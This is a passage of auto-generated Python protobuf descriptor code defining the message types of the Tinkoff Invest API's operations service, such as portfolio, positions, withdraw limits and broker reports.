      has_default_value=False, default_value=b"".decode('utf-8'),
      message_type=None, enum_type=None, containing_type=None,
      is_extension=False, extension_scope=None,
      serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
    _descriptor.FieldDescriptor(
      name='instrument_type', full_name='tinkoff.public.invest.api.contract.v1.Operation.instrument_type', index=9,
      number=10, type=9, cpp_type=9, label=1,
      has_default_value=False, default_value=b"".decode('utf-8'),
      message_type=None, enum_type=None, containing_type=None,
      is_extension=False, extension_scope=None,
      serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
    _descriptor.FieldDescriptor(
      name='date', full_name='tinkoff.public.invest.api.contract.v1.Operation.date', index=10,
      number=11, type=11, cpp_type=10, label=1,
      has_default_value=False, default_value=None,
      message_type=None, enum_type=None, containing_type=None,
      is_extension=False, extension_scope=None,
      serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
    _descriptor.FieldDescriptor(
      name='type', full_name='tinkoff.public.invest.api.contract.v1.Operation.type', index=11,
      number=12, type=9, cpp_type=9, label=1,
      has_default_value=False, default_value=b"".decode('utf-8'),
      message_type=None, enum_type=None, containing_type=None,
      is_extension=False, extension_scope=None,
      serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
    _descriptor.FieldDescriptor(
      name='operation_type', full_name='tinkoff.public.invest.api.contract.v1.Operation.operation_type', index=12,
      number=13, type=14, cpp_type=8, label=1,
      has_default_value=False, default_value=0,
      message_type=None, enum_type=None, containing_type=None,
      is_extension=False, extension_scope=None,
      serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
    _descriptor.FieldDescriptor(
      name='trades', full_name='tinkoff.public.invest.api.contract.v1.Operation.trades', index=13,
      number=14, type=11, cpp_type=10, label=3,
      has_default_value=False, default_value=[],
      message_type=None, enum_type=None, containing_type=None,
      is_extension=False, extension_scope=None,
      serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
  ],
  extensions=[
  ],
  nested_types=[],
  enum_types=[
  ],
  serialized_options=None,
  is_extendable=False,
  syntax='proto3',
  extension_ranges=[],
  oneofs=[
  ],
  # Byte offsets of this message's definition inside DESCRIPTOR.serialized_pb.
  serialized_start=447,
  serialized_end=1006,
)
# Generated protobuf Descriptor for the OperationTrade message
# (tinkoff.public.invest.api.contract.v1). protoc output — do not edit by hand.
# Field type codes: 9=string, 11=message, 3=int64.
_OPERATIONTRADE = _descriptor.Descriptor(
  name='OperationTrade',
  full_name='tinkoff.public.invest.api.contract.v1.OperationTrade',
  filename=None,
  file=DESCRIPTOR,
  containing_type=None,
  create_key=_descriptor._internal_create_key,
  fields=[
    _descriptor.FieldDescriptor(
      name='trade_id', full_name='tinkoff.public.invest.api.contract.v1.OperationTrade.trade_id', index=0,
      number=1, type=9, cpp_type=9, label=1,
      has_default_value=False, default_value=b"".decode('utf-8'),
      message_type=None, enum_type=None, containing_type=None,
      is_extension=False, extension_scope=None,
      serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
    _descriptor.FieldDescriptor(
      name='date_time', full_name='tinkoff.public.invest.api.contract.v1.OperationTrade.date_time', index=1,
      number=2, type=11, cpp_type=10, label=1,
      has_default_value=False, default_value=None,
      message_type=None, enum_type=None, containing_type=None,
      is_extension=False, extension_scope=None,
      serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
    _descriptor.FieldDescriptor(
      name='quantity', full_name='tinkoff.public.invest.api.contract.v1.OperationTrade.quantity', index=2,
      number=3, type=3, cpp_type=2, label=1,
      has_default_value=False, default_value=0,
      message_type=None, enum_type=None, containing_type=None,
      is_extension=False, extension_scope=None,
      serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
    _descriptor.FieldDescriptor(
      name='price', full_name='tinkoff.public.invest.api.contract.v1.OperationTrade.price', index=3,
      number=4, type=11, cpp_type=10, label=1,
      has_default_value=False, default_value=None,
      message_type=None, enum_type=None, containing_type=None,
      is_extension=False, extension_scope=None,
      serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
  ],
  extensions=[
  ],
  nested_types=[],
  enum_types=[
  ],
  serialized_options=None,
  is_extendable=False,
  syntax='proto3',
  extension_ranges=[],
  oneofs=[
  ],
  # Byte offsets of this message's definition inside DESCRIPTOR.serialized_pb.
  serialized_start=1009,
  serialized_end=1174,
)
# Generated protobuf Descriptor for the PortfolioRequest message
# (tinkoff.public.invest.api.contract.v1). protoc output — do not edit by hand.
# Single field: 'account_id', a singular string (type=9).
_PORTFOLIOREQUEST = _descriptor.Descriptor(
  name='PortfolioRequest',
  full_name='tinkoff.public.invest.api.contract.v1.PortfolioRequest',
  filename=None,
  file=DESCRIPTOR,
  containing_type=None,
  create_key=_descriptor._internal_create_key,
  fields=[
    _descriptor.FieldDescriptor(
      name='account_id', full_name='tinkoff.public.invest.api.contract.v1.PortfolioRequest.account_id', index=0,
      number=1, type=9, cpp_type=9, label=1,
      has_default_value=False, default_value=b"".decode('utf-8'),
      message_type=None, enum_type=None, containing_type=None,
      is_extension=False, extension_scope=None,
      serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
  ],
  extensions=[
  ],
  nested_types=[],
  enum_types=[
  ],
  serialized_options=None,
  is_extendable=False,
  syntax='proto3',
  extension_ranges=[],
  oneofs=[
  ],
  # Byte offsets of this message's definition inside DESCRIPTOR.serialized_pb.
  serialized_start=1176,
  serialized_end=1214,
)
# Generated protobuf Descriptor for the PortfolioResponse message
# (tinkoff.public.invest.api.contract.v1). protoc output — do not edit by hand.
# All fields are message-typed (type=11); 'positions' is repeated (label=3).
_PORTFOLIORESPONSE = _descriptor.Descriptor(
  name='PortfolioResponse',
  full_name='tinkoff.public.invest.api.contract.v1.PortfolioResponse',
  filename=None,
  file=DESCRIPTOR,
  containing_type=None,
  create_key=_descriptor._internal_create_key,
  fields=[
    _descriptor.FieldDescriptor(
      name='total_amount_shares', full_name='tinkoff.public.invest.api.contract.v1.PortfolioResponse.total_amount_shares', index=0,
      number=1, type=11, cpp_type=10, label=1,
      has_default_value=False, default_value=None,
      message_type=None, enum_type=None, containing_type=None,
      is_extension=False, extension_scope=None,
      serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
    _descriptor.FieldDescriptor(
      name='total_amount_bonds', full_name='tinkoff.public.invest.api.contract.v1.PortfolioResponse.total_amount_bonds', index=1,
      number=2, type=11, cpp_type=10, label=1,
      has_default_value=False, default_value=None,
      message_type=None, enum_type=None, containing_type=None,
      is_extension=False, extension_scope=None,
      serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
    _descriptor.FieldDescriptor(
      name='total_amount_etf', full_name='tinkoff.public.invest.api.contract.v1.PortfolioResponse.total_amount_etf', index=2,
      number=3, type=11, cpp_type=10, label=1,
      has_default_value=False, default_value=None,
      message_type=None, enum_type=None, containing_type=None,
      is_extension=False, extension_scope=None,
      serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
    _descriptor.FieldDescriptor(
      name='total_amount_currencies', full_name='tinkoff.public.invest.api.contract.v1.PortfolioResponse.total_amount_currencies', index=3,
      number=4, type=11, cpp_type=10, label=1,
      has_default_value=False, default_value=None,
      message_type=None, enum_type=None, containing_type=None,
      is_extension=False, extension_scope=None,
      serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
    _descriptor.FieldDescriptor(
      name='total_amount_futures', full_name='tinkoff.public.invest.api.contract.v1.PortfolioResponse.total_amount_futures', index=4,
      number=5, type=11, cpp_type=10, label=1,
      has_default_value=False, default_value=None,
      message_type=None, enum_type=None, containing_type=None,
      is_extension=False, extension_scope=None,
      serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
    _descriptor.FieldDescriptor(
      name='expected_yield', full_name='tinkoff.public.invest.api.contract.v1.PortfolioResponse.expected_yield', index=5,
      number=6, type=11, cpp_type=10, label=1,
      has_default_value=False, default_value=None,
      message_type=None, enum_type=None, containing_type=None,
      is_extension=False, extension_scope=None,
      serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
    _descriptor.FieldDescriptor(
      name='positions', full_name='tinkoff.public.invest.api.contract.v1.PortfolioResponse.positions', index=6,
      number=7, type=11, cpp_type=10, label=3,
      has_default_value=False, default_value=[],
      message_type=None, enum_type=None, containing_type=None,
      is_extension=False, extension_scope=None,
      serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
  ],
  extensions=[
  ],
  nested_types=[],
  enum_types=[
  ],
  serialized_options=None,
  is_extendable=False,
  syntax='proto3',
  extension_ranges=[],
  oneofs=[
  ],
  # Byte offsets of this message's definition inside DESCRIPTOR.serialized_pb.
  serialized_start=1217,
  serialized_end=1788,
)
# Generated protobuf Descriptor for the PositionsRequest message
# (tinkoff.public.invest.api.contract.v1). protoc output — do not edit by hand.
# Single field: 'account_id', a singular string (type=9).
_POSITIONSREQUEST = _descriptor.Descriptor(
  name='PositionsRequest',
  full_name='tinkoff.public.invest.api.contract.v1.PositionsRequest',
  filename=None,
  file=DESCRIPTOR,
  containing_type=None,
  create_key=_descriptor._internal_create_key,
  fields=[
    _descriptor.FieldDescriptor(
      name='account_id', full_name='tinkoff.public.invest.api.contract.v1.PositionsRequest.account_id', index=0,
      number=1, type=9, cpp_type=9, label=1,
      has_default_value=False, default_value=b"".decode('utf-8'),
      message_type=None, enum_type=None, containing_type=None,
      is_extension=False, extension_scope=None,
      serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
  ],
  extensions=[
  ],
  nested_types=[],
  enum_types=[
  ],
  serialized_options=None,
  is_extendable=False,
  syntax='proto3',
  extension_ranges=[],
  oneofs=[
  ],
  # Byte offsets of this message's definition inside DESCRIPTOR.serialized_pb.
  serialized_start=1790,
  serialized_end=1828,
)
# Generated protobuf Descriptor for the PositionsResponse message
# (tinkoff.public.invest.api.contract.v1). protoc output — do not edit by hand.
# Field type codes: 11=message, 8=bool; label=3 is repeated.
_POSITIONSRESPONSE = _descriptor.Descriptor(
  name='PositionsResponse',
  full_name='tinkoff.public.invest.api.contract.v1.PositionsResponse',
  filename=None,
  file=DESCRIPTOR,
  containing_type=None,
  create_key=_descriptor._internal_create_key,
  fields=[
    _descriptor.FieldDescriptor(
      name='money', full_name='tinkoff.public.invest.api.contract.v1.PositionsResponse.money', index=0,
      number=1, type=11, cpp_type=10, label=3,
      has_default_value=False, default_value=[],
      message_type=None, enum_type=None, containing_type=None,
      is_extension=False, extension_scope=None,
      serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
    _descriptor.FieldDescriptor(
      name='blocked', full_name='tinkoff.public.invest.api.contract.v1.PositionsResponse.blocked', index=1,
      number=2, type=11, cpp_type=10, label=3,
      has_default_value=False, default_value=[],
      message_type=None, enum_type=None, containing_type=None,
      is_extension=False, extension_scope=None,
      serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
    _descriptor.FieldDescriptor(
      name='securities', full_name='tinkoff.public.invest.api.contract.v1.PositionsResponse.securities', index=2,
      number=3, type=11, cpp_type=10, label=3,
      has_default_value=False, default_value=[],
      message_type=None, enum_type=None, containing_type=None,
      is_extension=False, extension_scope=None,
      serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
    _descriptor.FieldDescriptor(
      name='limits_loading_in_progress', full_name='tinkoff.public.invest.api.contract.v1.PositionsResponse.limits_loading_in_progress', index=3,
      number=4, type=8, cpp_type=7, label=1,
      has_default_value=False, default_value=False,
      message_type=None, enum_type=None, containing_type=None,
      is_extension=False, extension_scope=None,
      serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
    _descriptor.FieldDescriptor(
      name='futures', full_name='tinkoff.public.invest.api.contract.v1.PositionsResponse.futures', index=4,
      number=5, type=11, cpp_type=10, label=3,
      has_default_value=False, default_value=[],
      message_type=None, enum_type=None, containing_type=None,
      is_extension=False, extension_scope=None,
      serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
  ],
  extensions=[
  ],
  nested_types=[],
  enum_types=[
  ],
  serialized_options=None,
  is_extendable=False,
  syntax='proto3',
  extension_ranges=[],
  oneofs=[
  ],
  # Byte offsets of this message's definition inside DESCRIPTOR.serialized_pb.
  serialized_start=1831,
  serialized_end=2174,
)
# Generated protobuf Descriptor for the WithdrawLimitsRequest message
# (tinkoff.public.invest.api.contract.v1). protoc output — do not edit by hand.
# Single field: 'account_id', a singular string (type=9).
_WITHDRAWLIMITSREQUEST = _descriptor.Descriptor(
  name='WithdrawLimitsRequest',
  full_name='tinkoff.public.invest.api.contract.v1.WithdrawLimitsRequest',
  filename=None,
  file=DESCRIPTOR,
  containing_type=None,
  create_key=_descriptor._internal_create_key,
  fields=[
    _descriptor.FieldDescriptor(
      name='account_id', full_name='tinkoff.public.invest.api.contract.v1.WithdrawLimitsRequest.account_id', index=0,
      number=1, type=9, cpp_type=9, label=1,
      has_default_value=False, default_value=b"".decode('utf-8'),
      message_type=None, enum_type=None, containing_type=None,
      is_extension=False, extension_scope=None,
      serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
  ],
  extensions=[
  ],
  nested_types=[],
  enum_types=[
  ],
  serialized_options=None,
  is_extendable=False,
  syntax='proto3',
  extension_ranges=[],
  oneofs=[
  ],
  # Byte offsets of this message's definition inside DESCRIPTOR.serialized_pb.
  serialized_start=2176,
  serialized_end=2219,
)
# Generated protobuf Descriptor for the WithdrawLimitsResponse message
# (tinkoff.public.invest.api.contract.v1). protoc output — do not edit by hand.
# Three repeated (label=3) message fields (type=11).
_WITHDRAWLIMITSRESPONSE = _descriptor.Descriptor(
  name='WithdrawLimitsResponse',
  full_name='tinkoff.public.invest.api.contract.v1.WithdrawLimitsResponse',
  filename=None,
  file=DESCRIPTOR,
  containing_type=None,
  create_key=_descriptor._internal_create_key,
  fields=[
    _descriptor.FieldDescriptor(
      name='money', full_name='tinkoff.public.invest.api.contract.v1.WithdrawLimitsResponse.money', index=0,
      number=1, type=11, cpp_type=10, label=3,
      has_default_value=False, default_value=[],
      message_type=None, enum_type=None, containing_type=None,
      is_extension=False, extension_scope=None,
      serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
    _descriptor.FieldDescriptor(
      name='blocked', full_name='tinkoff.public.invest.api.contract.v1.WithdrawLimitsResponse.blocked', index=1,
      number=2, type=11, cpp_type=10, label=3,
      has_default_value=False, default_value=[],
      message_type=None, enum_type=None, containing_type=None,
      is_extension=False, extension_scope=None,
      serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
    _descriptor.FieldDescriptor(
      name='blocked_guarantee', full_name='tinkoff.public.invest.api.contract.v1.WithdrawLimitsResponse.blocked_guarantee', index=2,
      number=3, type=11, cpp_type=10, label=3,
      has_default_value=False, default_value=[],
      message_type=None, enum_type=None, containing_type=None,
      is_extension=False, extension_scope=None,
      serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
  ],
  extensions=[
  ],
  nested_types=[],
  enum_types=[
  ],
  serialized_options=None,
  is_extendable=False,
  syntax='proto3',
  extension_ranges=[],
  oneofs=[
  ],
  # Byte offsets of this message's definition inside DESCRIPTOR.serialized_pb.
  serialized_start=2222,
  serialized_end=2458,
)
# Generated protobuf Descriptor for the PortfolioPosition message
# (tinkoff.public.invest.api.contract.v1). protoc output — do not edit by hand.
# Field type codes: 9=string, 11=message; all fields singular (label=1).
_PORTFOLIOPOSITION = _descriptor.Descriptor(
  name='PortfolioPosition',
  full_name='tinkoff.public.invest.api.contract.v1.PortfolioPosition',
  filename=None,
  file=DESCRIPTOR,
  containing_type=None,
  create_key=_descriptor._internal_create_key,
  fields=[
    _descriptor.FieldDescriptor(
      name='figi', full_name='tinkoff.public.invest.api.contract.v1.PortfolioPosition.figi', index=0,
      number=1, type=9, cpp_type=9, label=1,
      has_default_value=False, default_value=b"".decode('utf-8'),
      message_type=None, enum_type=None, containing_type=None,
      is_extension=False, extension_scope=None,
      serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
    _descriptor.FieldDescriptor(
      name='instrument_type', full_name='tinkoff.public.invest.api.contract.v1.PortfolioPosition.instrument_type', index=1,
      number=2, type=9, cpp_type=9, label=1,
      has_default_value=False, default_value=b"".decode('utf-8'),
      message_type=None, enum_type=None, containing_type=None,
      is_extension=False, extension_scope=None,
      serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
    _descriptor.FieldDescriptor(
      name='quantity', full_name='tinkoff.public.invest.api.contract.v1.PortfolioPosition.quantity', index=2,
      number=3, type=11, cpp_type=10, label=1,
      has_default_value=False, default_value=None,
      message_type=None, enum_type=None, containing_type=None,
      is_extension=False, extension_scope=None,
      serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
    _descriptor.FieldDescriptor(
      name='average_position_price', full_name='tinkoff.public.invest.api.contract.v1.PortfolioPosition.average_position_price', index=3,
      number=4, type=11, cpp_type=10, label=1,
      has_default_value=False, default_value=None,
      message_type=None, enum_type=None, containing_type=None,
      is_extension=False, extension_scope=None,
      serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
    _descriptor.FieldDescriptor(
      name='expected_yield', full_name='tinkoff.public.invest.api.contract.v1.PortfolioPosition.expected_yield', index=4,
      number=5, type=11, cpp_type=10, label=1,
      has_default_value=False, default_value=None,
      message_type=None, enum_type=None, containing_type=None,
      is_extension=False, extension_scope=None,
      serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
    _descriptor.FieldDescriptor(
      name='current_nkd', full_name='tinkoff.public.invest.api.contract.v1.PortfolioPosition.current_nkd', index=5,
      number=6, type=11, cpp_type=10, label=1,
      has_default_value=False, default_value=None,
      message_type=None, enum_type=None, containing_type=None,
      is_extension=False, extension_scope=None,
      serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
    _descriptor.FieldDescriptor(
      name='average_position_price_pt', full_name='tinkoff.public.invest.api.contract.v1.PortfolioPosition.average_position_price_pt', index=6,
      number=7, type=11, cpp_type=10, label=1,
      has_default_value=False, default_value=None,
      message_type=None, enum_type=None, containing_type=None,
      is_extension=False, extension_scope=None,
      serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
    _descriptor.FieldDescriptor(
      name='current_price', full_name='tinkoff.public.invest.api.contract.v1.PortfolioPosition.current_price', index=7,
      number=8, type=11, cpp_type=10, label=1,
      has_default_value=False, default_value=None,
      message_type=None, enum_type=None, containing_type=None,
      is_extension=False, extension_scope=None,
      serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
    _descriptor.FieldDescriptor(
      name='average_position_price_fifo', full_name='tinkoff.public.invest.api.contract.v1.PortfolioPosition.average_position_price_fifo', index=8,
      number=9, type=11, cpp_type=10, label=1,
      has_default_value=False, default_value=None,
      message_type=None, enum_type=None, containing_type=None,
      is_extension=False, extension_scope=None,
      serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
    _descriptor.FieldDescriptor(
      name='quantity_lots', full_name='tinkoff.public.invest.api.contract.v1.PortfolioPosition.quantity_lots', index=9,
      number=10, type=11, cpp_type=10, label=1,
      has_default_value=False, default_value=None,
      message_type=None, enum_type=None, containing_type=None,
      is_extension=False, extension_scope=None,
      serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
  ],
  extensions=[
  ],
  nested_types=[],
  enum_types=[
  ],
  serialized_options=None,
  is_extendable=False,
  syntax='proto3',
  extension_ranges=[],
  oneofs=[
  ],
  # Byte offsets of this message's definition inside DESCRIPTOR.serialized_pb.
  serialized_start=2461,
  serialized_end=3136,
)
# Generated protobuf Descriptor for the PositionsSecurities message
# (tinkoff.public.invest.api.contract.v1). protoc output — do not edit by hand.
# Field type codes: 9=string, 3=int64.
_POSITIONSSECURITIES = _descriptor.Descriptor(
  name='PositionsSecurities',
  full_name='tinkoff.public.invest.api.contract.v1.PositionsSecurities',
  filename=None,
  file=DESCRIPTOR,
  containing_type=None,
  create_key=_descriptor._internal_create_key,
  fields=[
    _descriptor.FieldDescriptor(
      name='figi', full_name='tinkoff.public.invest.api.contract.v1.PositionsSecurities.figi', index=0,
      number=1, type=9, cpp_type=9, label=1,
      has_default_value=False, default_value=b"".decode('utf-8'),
      message_type=None, enum_type=None, containing_type=None,
      is_extension=False, extension_scope=None,
      serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
    _descriptor.FieldDescriptor(
      name='blocked', full_name='tinkoff.public.invest.api.contract.v1.PositionsSecurities.blocked', index=1,
      number=2, type=3, cpp_type=2, label=1,
      has_default_value=False, default_value=0,
      message_type=None, enum_type=None, containing_type=None,
      is_extension=False, extension_scope=None,
      serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
    _descriptor.FieldDescriptor(
      name='balance', full_name='tinkoff.public.invest.api.contract.v1.PositionsSecurities.balance', index=2,
      number=3, type=3, cpp_type=2, label=1,
      has_default_value=False, default_value=0,
      message_type=None, enum_type=None, containing_type=None,
      is_extension=False, extension_scope=None,
      serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
  ],
  extensions=[
  ],
  nested_types=[],
  enum_types=[
  ],
  serialized_options=None,
  is_extendable=False,
  syntax='proto3',
  extension_ranges=[],
  oneofs=[
  ],
  # Byte offsets of this message's definition inside DESCRIPTOR.serialized_pb.
  serialized_start=3138,
  serialized_end=3207,
)
# Generated protobuf Descriptor for the PositionsFutures message
# (tinkoff.public.invest.api.contract.v1). protoc output — do not edit by hand.
# Structurally identical to PositionsSecurities: figi (string), blocked/balance (int64).
_POSITIONSFUTURES = _descriptor.Descriptor(
  name='PositionsFutures',
  full_name='tinkoff.public.invest.api.contract.v1.PositionsFutures',
  filename=None,
  file=DESCRIPTOR,
  containing_type=None,
  create_key=_descriptor._internal_create_key,
  fields=[
    _descriptor.FieldDescriptor(
      name='figi', full_name='tinkoff.public.invest.api.contract.v1.PositionsFutures.figi', index=0,
      number=1, type=9, cpp_type=9, label=1,
      has_default_value=False, default_value=b"".decode('utf-8'),
      message_type=None, enum_type=None, containing_type=None,
      is_extension=False, extension_scope=None,
      serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
    _descriptor.FieldDescriptor(
      name='blocked', full_name='tinkoff.public.invest.api.contract.v1.PositionsFutures.blocked', index=1,
      number=2, type=3, cpp_type=2, label=1,
      has_default_value=False, default_value=0,
      message_type=None, enum_type=None, containing_type=None,
      is_extension=False, extension_scope=None,
      serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
    _descriptor.FieldDescriptor(
      name='balance', full_name='tinkoff.public.invest.api.contract.v1.PositionsFutures.balance', index=2,
      number=3, type=3, cpp_type=2, label=1,
      has_default_value=False, default_value=0,
      message_type=None, enum_type=None, containing_type=None,
      is_extension=False, extension_scope=None,
      serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
  ],
  extensions=[
  ],
  nested_types=[],
  enum_types=[
  ],
  serialized_options=None,
  is_extendable=False,
  syntax='proto3',
  extension_ranges=[],
  oneofs=[
  ],
  # Byte offsets of this message's definition inside DESCRIPTOR.serialized_pb.
  serialized_start=3209,
  serialized_end=3275,
)
# Generated protobuf Descriptor for the BrokerReportRequest message
# (tinkoff.public.invest.api.contract.v1). protoc output — do not edit by hand.
# The two message fields belong to the 'payload' oneof declared below;
# the oneof's fields list is populated later by the generated wiring code.
_BROKERREPORTREQUEST = _descriptor.Descriptor(
  name='BrokerReportRequest',
  full_name='tinkoff.public.invest.api.contract.v1.BrokerReportRequest',
  filename=None,
  file=DESCRIPTOR,
  containing_type=None,
  create_key=_descriptor._internal_create_key,
  fields=[
    _descriptor.FieldDescriptor(
      name='generate_broker_report_request', full_name='tinkoff.public.invest.api.contract.v1.BrokerReportRequest.generate_broker_report_request', index=0,
      number=1, type=11, cpp_type=10, label=1,
      has_default_value=False, default_value=None,
      message_type=None, enum_type=None, containing_type=None,
      is_extension=False, extension_scope=None,
      serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
    _descriptor.FieldDescriptor(
      name='get_broker_report_request', full_name='tinkoff.public.invest.api.contract.v1.BrokerReportRequest.get_broker_report_request', index=1,
      number=2, type=11, cpp_type=10, label=1,
      has_default_value=False, default_value=None,
      message_type=None, enum_type=None, containing_type=None,
      is_extension=False, extension_scope=None,
      serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
  ],
  extensions=[
  ],
  nested_types=[],
  enum_types=[
  ],
  serialized_options=None,
  is_extendable=False,
  syntax='proto3',
  extension_ranges=[],
  oneofs=[
    _descriptor.OneofDescriptor(
      name='payload', full_name='tinkoff.public.invest.api.contract.v1.BrokerReportRequest.payload',
      index=0, containing_type=None,
      create_key=_descriptor._internal_create_key,
      fields=[]),
  ],
  # Byte offsets of this message's definition inside DESCRIPTOR.serialized_pb.
  serialized_start=3278,
  serialized_end=3520,
)
# Generated protobuf Descriptor for the BrokerReportResponse message
# (tinkoff.public.invest.api.contract.v1). protoc output — do not edit by hand.
# Mirrors BrokerReportRequest: two message fields under a 'payload' oneof.
_BROKERREPORTRESPONSE = _descriptor.Descriptor(
  name='BrokerReportResponse',
  full_name='tinkoff.public.invest.api.contract.v1.BrokerReportResponse',
  filename=None,
  file=DESCRIPTOR,
  containing_type=None,
  create_key=_descriptor._internal_create_key,
  fields=[
    _descriptor.FieldDescriptor(
      name='generate_broker_report_response', full_name='tinkoff.public.invest.api.contract.v1.BrokerReportResponse.generate_broker_report_response', index=0,
      number=1, type=11, cpp_type=10, label=1,
      has_default_value=False, default_value=None,
      message_type=None, enum_type=None, containing_type=None,
      is_extension=False, extension_scope=None,
      serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
    _descriptor.FieldDescriptor(
      name='get_broker_report_response', full_name='tinkoff.public.invest.api.contract.v1.BrokerReportResponse.get_broker_report_response', index=1,
      number=2, type=11, cpp_type=10, label=1,
      has_default_value=False, default_value=None,
      message_type=None, enum_type=None, containing_type=None,
      is_extension=False, extension_scope=None,
      serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
  ],
  extensions=[
  ],
  nested_types=[],
  enum_types=[
  ],
  serialized_options=None,
  is_extendable=False,
  syntax='proto3',
  extension_ranges=[],
  oneofs=[
    _descriptor.OneofDescriptor(
      name='payload', full_name='tinkoff.public.invest.api.contract.v1.BrokerReportResponse.payload',
      index=0, containing_type=None,
      create_key=_descriptor._internal_create_key,
      fields=[]),
  ],
  # Byte offsets of this message's definition inside DESCRIPTOR.serialized_pb.
  serialized_start=3523,
  serialized_end=3770,
)
# Generated protobuf Descriptor for the GenerateBrokerReportRequest message
# (tinkoff.public.invest.api.contract.v1). protoc output — do not edit by hand.
# NOTE: the field named 'from' shadows a Python keyword, so on message instances
# it must be accessed via getattr(msg, 'from').
_GENERATEBROKERREPORTREQUEST = _descriptor.Descriptor(
  name='GenerateBrokerReportRequest',
  full_name='tinkoff.public.invest.api.contract.v1.GenerateBrokerReportRequest',
  filename=None,
  file=DESCRIPTOR,
  containing_type=None,
  create_key=_descriptor._internal_create_key,
  fields=[
    _descriptor.FieldDescriptor(
      name='account_id', full_name='tinkoff.public.invest.api.contract.v1.GenerateBrokerReportRequest.account_id', index=0,
      number=1, type=9, cpp_type=9, label=1,
      has_default_value=False, default_value=b"".decode('utf-8'),
      message_type=None, enum_type=None, containing_type=None,
      is_extension=False, extension_scope=None,
      serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
    _descriptor.FieldDescriptor(
      name='from', full_name='tinkoff.public.invest.api.contract.v1.GenerateBrokerReportRequest.from', index=1,
      number=2, type=11, cpp_type=10, label=1,
      has_default_value=False, default_value=None,
      message_type=None, enum_type=None, containing_type=None,
      is_extension=False, extension_scope=None,
      serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
    _descriptor.FieldDescriptor(
      name='to', full_name='tinkoff.public.invest.api.contract.v1.GenerateBrokerReportRequest.to', index=2,
      number=3, type=11, cpp_type=10, label=1,
      has_default_value=False, default_value=None,
      message_type=None, enum_type=None, containing_type=None,
      is_extension=False, extension_scope=None,
      serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
  ],
  extensions=[
  ],
  nested_types=[],
  enum_types=[
  ],
  serialized_options=None,
  is_extendable=False,
  syntax='proto3',
  extension_ranges=[],
  oneofs=[
  ],
  # Byte offsets of this message's definition inside DESCRIPTOR.serialized_pb.
  serialized_start=3773,
  serialized_end=3904,
)
_GENERATEBROKERREPORTRESPONSE = _descriptor.Descriptor(
name='GenerateBrokerReportResponse',
full_name='tinkoff.public.invest.api.contract.v1.GenerateBrokerReportResponse',
filename=None,
file=DESCRIPTOR,
containing_type=None,
create_key=_descriptor._internal_create_key,
fields=[
_descriptor.FieldDescriptor(
name='task_id', full_name='tinkoff.public.invest.api.contract.v1.GenerateBrokerReportResponse.task_id', index=0,
number=1, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
],
extensions=[
],
nested_types=[],
enum_types=[
],
serialized_options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=3906,
serialized_end=3953,
)
_GETBROKERREPORTREQUEST = _descriptor.Descriptor(
name='GetBrokerReportRequest',
